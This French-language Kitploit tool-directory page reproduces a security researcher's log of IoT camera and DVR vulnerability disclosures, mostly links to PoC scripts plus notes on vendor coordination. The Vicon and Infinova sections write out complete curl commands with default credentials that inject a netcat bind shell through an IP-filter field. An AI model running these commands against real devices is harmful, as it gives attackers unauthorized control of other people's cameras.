Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC — Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported. | Kitploit
Outils/GitHubGitHub/mcw0/poc
Embedded Systems SecurityReconnaissanceIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingBinary Exploitation
GitHubmcw0/poc

PoC

Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.

Voir le dépôt
783307il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC

PoC divers - Internet des objets (in)sécurisés

Ça vaut vraiment la peine de lire ces (in)sécurités pourries : https://ipvm.com/reports/security-exploits

Hikvision CVE-2021-36260

2021-10-19

Tout le crédit à Watchful_IP (https://watchfulip.github.io/)

https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py

Dahua CVE-2021-33044, CVE-2021-33045

2021-10-06

Détails : https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

PoC : https://github.com/mcw0/DahuaConsole

2021-09-06

Deux contournements d'authentification indépendants.

En raison du très fort potentiel d'un autre « Dahua mass hack », je conserverai les détails de la divulgation complète jusqu'au 6 octobre 2021.

Je recommande fortement de mettre à jour le firmware d'ici là.

https://www.dahuasecurity.com/support/cybersecurity/details/957

Chiffrement/déchiffrement DES/3DES Dahua, fuites d'identifiants NetSDK, clés/mots de passe Cloud, PoC DHP2P

2020-05-09

  • Implémentation d'authentification Dahua DES/3DES (cassée) et PSK
  • Vulnérabilité : Dahua NetSDK fuit les identifiants (8 premiers caractères) de tous les clients dans la requête REALM lors de l'utilisation des protocoles DVRIP et DHP2P
  • PoC : ajout d'un simple listener DVRIP TCP/37777 pour afficher les identifiants déchiffrés en clair
  • Vulnérabilité : fuite d'identifiants du protocole Cloud DHP2P de Dahua
  • Vulnérabilité : clés/mots de passe Cloud DHP2P codés en dur pour 23 fournisseurs différents
  • PoC : accès aux appareils au sein du Cloud DHP2P. PoC réalisé uniquement pour Dahua IMOU

https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py

Mise à jour : Dahua-JSON-Debug-Console-v2.py

2020-02-29

  • Ajout de l'option 'setDebug', devrait commencer à produire une sortie depuis la Debug Console dans VTO/VTH
  • Ajout de '--discover', recherche multicast d'appareils ou sonde directe (--rhost 192.168.57.20) d'un appareil via UDP/37810
  • Ajout de '--dump {config,service}' pour vider la config ou les services sur un hôte distant sans entrer dans la Debug Console

https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py

Mise à jour

2020-02-15

Un contact a été établi cette semaine avec le PSIRT de Dahua, les détails, le PoC et les preuves pour 23 fournisseurs cloud différents ont été fournis. Je suivrai également le nouvel essai de Google Zero « Policy and Disclosure: 2020 Edition » (car cela a du sens pour moi), ce qui signifie que je publierai après 90 jours, que Dahua publie ou non des mises à jour avant ou après le 09.05.2020 19:00 UTC (9 mai 2020 19:00 UTC).

Dahua, veuillez corriger et rendre les mises à jour disponibles avant cette date...

Référence : Google Zero « Policy and Disclosure: 2020 Edition » : https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html

Il y a quelques heures

2020-02-10

Je viens de divulguer au PSIRT de Dahua des fuites d'identifiants (aboutissant en clair) provenant du SDK Dahua, voyons comment ils vont prendre cette information. Assez mauvais quand il y a plus de 20 fournisseurs cloud différents impliqués... 90 jours qui défilent à partir d'aujourd'hui.

Outils

2020-01-20

Nouveau dépôt créé où je prévois de pousser quelques outils.

https://github.com/mcw0/Tools

Première sortie : Dahua-JSON-Debug-Console-v2.py

  • Porté vers Python 3
  • Correction de quelques bugs et ajustement du code
  • Ajout du support de DVRIP (TCP/37777) [Remarque : certaines commandes JSON qui fonctionnent avec DHIP ne retournent rien avec DVRIP]
  • encodage/décodage en latin-1, nous pourrions avoir besoin des caractères intacts entre 0x00 - 0xff
  • Meilleur 'debug' avec hexdump en option

Axis Communications

2019-10-06 (vieilleries)

Détecter anonymement le modèle et la version du firmware des appareils Axis (1998 - 2019).

https://github.com/mcw0/PoC/blob/master/axis-detect.py

PoC du contrôleur de switch géré Realtek (RTL83xx)

2019-08-20

https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py

Plusieurs vulnérabilités dans de nombreux switchs réseau

2019-08-06

https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches

Tous les détails techniques accompagnés du PoC Python seront publiés ici le 20 août 2019.

LifeSafety Power

2019-05-15

Multiples débordements de pile, RCE, divulgation de nom d'utilisateur/mot de passe en clair et plus encore

https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py

Console de débogage JSON DHIP Dahua (authentifiée)

2019-04-10

Ce script utilisera le protocole binaire P2P « DHIP » de Dahua, qui fonctionne sur les ports HTTP/HTTPS normaux et TCP/5000

S'attachera à la « Debug Console » interne des appareils Dahua en utilisant JSON (même type que l'ancien débogage sur TCP/6789)

https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py

Amusez-vous bien, bashis

VDOO

2019-01-23

Salutations, cela fait longtemps sans publier ...

Je suis toujours là et je poursuis mes recherches, mais la nouvelle est que j'essaie aussi de travailler avec VDOO (https://www.vdoo.com/) pour la gestion des fournisseurs, ce qui a malheureusement quelque peu retardé mon processus de divulgation complète ...

Quoi qu'il en soit, plusieurs recherches intéressantes arrivent en divulgation complète ici sur mon GitHub.

Grâce à la collaboration avec VDOO, je peux travailler sur ce que j'aime faire, et ne pas perdre de temps avec les fournisseurs qui (ne veulent pas | ne comprennent pas | veulent ignorer | veulent retarder | peu importe).

Les plus récents concernent du matériel Reolink (https://reolink.com/), que vous trouverez ici : https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.

AVTECH Corporation

2018-06-18

AVTECH {DVR/NVR/IPC} Débordement de tas, API IPCP, RCE

https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt

https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py

Reolink Digital Technology Co., Ltd.

2018-06-03

Reolink {IPC} RCE (Authentifié)

https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py

Shenzhen TVT Digital Technology Co. Ltd

2018-04-09

Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py

AVTECH

2018-03-05

AVTECH {DVR/NVR/IPC} RCE authentifié

https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py

Geovision Inc.

2018-02-01

Geovision Inc. Caméra IP/Vidéo/Contrôle d'accès : exécution multiple de commandes à distance - Débordements de pile multiples - Double free - Accès non autorisé https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt

PoC d'exécution de commandes à distance sur caméra IP & serveur vidéo Geovision Inc. https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py

Herospeed

2018-01-22

Le démon TelnetSwitch de Herospeed tournant sur TCP/787, permettant l'activation de telnetd. Où un petit débordement de pile nous permet d'écraser le mot de passe généré dynamiquement et d'activer telnetd. https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py

Foscam

2018-01-15

Petit wrapper OpenSSL permettant de boucler différentes clés de chiffrement/digests et chiffrements sur les images du firmware Foscam IPC. https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py

Désobfusquer les chaînes/login/mot de passe/clé crypto dans divers binaires et bibliothèques Foscam IPC https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py

RCE et divulgation d'informations Vitek (et possiblement d'autres OEM) 0-day

2017-12-22

https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt

Chaîne de format de pile à distance dans le binaire 'nsd' de plusieurs OEM (0-day)

2017-12-14

https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt

Image ici : http://62.43.36.107:50021/Public/CCTV/GWSecu/GWSecu%20Updater%20para%20c%C3%A1maras/Firmware%20para%20c%C3%A1mara%20domo/

Preuve de concept de backdoor par chaîne de format sans crash

2017-12-05

https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c

RCE Vicon Security (authentifié)

2017-12-03

// Activer le « Filtre IP »

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// Ajouter au « Filtre IP » et exécuter

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// Désactiver le « Filtre IP »

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// Supprimer du « Filtre IP »

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

RCE Infinova (authentifié)

2017-12-03

// Activer le « Filtre IP »

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// Ajouter au « Filtre IP » et exécuter

curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// Désactiver le « Filtre IP »

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// Supprimer du « Filtre IP »

curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

Remarque : je suis assez sûr qu'il existe d'autres OEM qui partagent la même chose.

Axis Communications

2017-12-01 Axis Communications MPQT/PACS Débordement de tas et fuite d'informations https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt

Stunnel

2017-11-13 Shell de confidentialité stunnel TLSv1 inversé https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt

Vivotek

2017-11-13 Caméras IP Vivotek - Débordement de pile à distance https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt

Uniview

2017-10-29 PoC RCE et export de configuration Uniview https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt

Axis

2017-10-19 Un vieux fuzzing oublié du Q3/2016 qui a mené à une RCE (PoC : shell de connexion inversée à distance) et à la lecture à distance de /etc/shadow. Signalé à Axis et corrigé au Q3/2016, je continue de le poster ici maintenant car cela peut être un bon indice. https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE

DAHUA

2017-10-17 Activer / Désactiver Telnetd dans Dahua (pour les versions de firmware plus récentes) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py

2017-05-03

Republication publique du PoC de la backdoor Dahua https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py

2017-03-20

Fort de mes nouvelles connaissances sur les appareils vulnérables présents dans la nature, avec un nombre incroyable de plus d'un million d'unités Dahua / OEM, connaissances provenant d'un rapport de NSFOCUS et de mes propres recherches sur shodan.io.

Avec ces connaissances, je ne publierai pas le PoC Python au public comme annoncé précédemment pour le 5 avril, car cela n'est pas nécessaire puisque le PoC a déjà été vérifié par IPVM et d'autres chercheurs en sécurité indépendants.

Cependant, je suis ouvert au partage du PoC avec des chercheurs en sécurité sérieux si cela est souhaité, veuillez m'envoyer un e-mail hors liste et soyez clair sur qui vous êtes afin que je ne vous prenne pas pour un quémandeur, que j'ignore.

Rapport NSFOCUS : http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/

/bashis


Avez-vous remarqué les horodatages sur les correctifs de Dahua ? Vérifiez les captures d'écran de http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png

https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png

Non seulement les NVR/DVR/IPC/HDCVI sont dans la liste

Le système d'interphonie aussi, le VTO2000A a été confirmé http://www1.dahuasecurity.com/au/products/vto2000a-762.html

Télécharger l’outil